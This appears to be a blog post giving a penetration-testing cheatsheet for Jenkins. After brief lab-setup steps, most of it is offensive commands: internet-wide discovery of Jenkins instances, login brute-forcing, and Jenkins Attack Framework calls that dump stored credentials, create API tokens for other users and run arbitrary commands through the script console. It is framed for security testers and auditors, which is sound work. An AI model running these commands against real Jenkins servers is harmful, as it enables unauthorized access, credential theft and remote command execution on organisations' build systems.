 |
| Jenkins Penetration Testing Cheatsheet |
This cheatsheet is designed to serve as a quick reference for penetration testers, security professionals, and DevSecOps practitioners seeking to evaluate the security of Jenkins instances effectively. It covers key attack vectors, misconfigurations, and potential vulnerabilities in Jenkins environments, along with tips for identifying and mitigating risks. Whether you're performing an in-depth penetration test or a quick security audit, this guide will help you navigate Jenkins' intricacies with precision.
Setting up Test Environment sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \ https://pkg.jenkins.io/debian/jenkins.io-2023.key echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \ https://pkg.jenkins.io/debian binary/ | sudo tee \ /etc/apt/sources.list.d/jenkins.list > /dev/null sudo apt-get update sudo apt-get install jenkins apt install openjdk-11-jdk #Admin password cat /var/lib/jenkins/secrets/initialAdminPassword #Access the server or use the server ip address http://127.0.0.1:8080
Jenkins Scanner # Used to find Jenkins Instances over the internet/Intranet - Mass Host Discovery download JenkinsScanner.sh from JenkinsVulnFinder #start the scan, Accessible Jenkins instances will be saved in a given filename ./JenkinsScanner.sh -i ip_list.txt -p 80,443,8443,8080,8010,8090,8085 -o jenkins_instances.txt #Download JenkinsVulnFinder.py wget https://github.com/Bhanunamikaze/JenkinsVulnFinder/blob/main/JenkinsVulnsFinder.py # Run the scanner with anonymous access: python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --nocred # Run the scanner with credentials: python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --cred username:password # Run the scanner with brute-force enabled: python JenkinsVulnsFinder.py --url http://172.19.107.32:8080/ --nocred --brute --users users.txt --pass pass.txt # Run Scanner with Directory/Path Search - Takes wordlist file as input python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --nocred --dirb wordlist.txt python JenkinsVulnsFinder.py --url http://172.19.107.32:8080 --cred --dirb wordlist.txt
Jenkins Attack Framework
#Installation
git clone git@github.com:Accenture/jenkins-attack-framework.git
cd jenkins-attack-framework
chmod +x jaf
sudo ./jaf --install
./jaf --install
#Check access, if creds are not provided, it tries anonymous access
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a User:user
#Auth check via Cookie - Append Cookie | Crumb headers as below (crumb is optional sometimes)
#This is useful when only SSO is allowed
python jaf.py AccessCheck -s http://172.19.107.32:8080/ -a "JSESSIONID.b56cceb4=node01gv13h0gw8msto7tpp82pv499.node0|crumb=74366885010b4471c265872d42bcf5767773698bab0b49dc09d48dd8bfa0725e"
# View console output for the last build of every job that the user can see
python jaf.py ConsoleOutput -s http://172.19.107.32:8080/ -a User:user
#Create API Token, Need privileges
python jaf.py CreateAPIToken -s http://172.19.107.32:8080/ -a User:user
#Create an API Token on behalf of user `Bhanu`
python jaf.py CreateAPIToken -s http://172.19.107.32:8080/ -a User:user --User Bhanu
# Dump Creds, require administrative credentials with /script access.
python jaf.py DumpCreds -s http://172.19.107.32:8080/ -a Bhanu:Bhanu
# List API tokens for a given user ; require administrative credentials with /script access.
python jaf.py ListAPITokens -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User
#List jobs
python jaf.py ListJobs -s http://172.19.107.32:8080/ -a Bhanu:Bhanu --user User
# Run any command, require administrative credentials with /script access.
python jaf.py RunCommand whoami -s http://172.19.107.32:8080/ -a Bhanu:Bhanu
No comments:
Post a Comment